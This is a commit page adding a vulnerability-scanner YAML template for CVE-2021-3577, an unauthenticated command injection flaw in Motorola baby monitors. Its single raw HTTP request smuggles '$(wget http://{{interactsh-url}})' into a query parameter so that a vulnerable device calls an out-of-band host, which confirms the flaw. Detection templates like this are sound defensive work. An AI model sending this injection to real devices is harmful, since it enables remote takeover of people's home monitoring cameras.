Create CVE-2021-3577.yaml
Vulnerabilities in the interface of Motorola Baby Monitors could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>patch-1
parent
a71e2c9e62
commit
7d57a07d86
|
@ -0,0 +1,33 @@
|
|||
id: CVE-2021-3577
|
||||
|
||||
info:
|
||||
name: Motorola Baby Monitors Unauthenticated RCE
|
||||
description: Vulnerabilities in the interface of Motorola Baby Monitors could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
|
||||
author: gy741
|
||||
severity: critical
|
||||
reference:
|
||||
- https://randywestergren.com/unauthenticated-remote-code-execution-in-motorola-baby-monitors/
|
||||
tags: cve,cve2021,baby,rce,oob
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2021-3577
|
||||
cwe-id: CWE-78
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /?action=command&command=set_city_timezone&value=$(wget%20http://{{interactsh-url}})) HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
|
Loading…
Reference in New Issue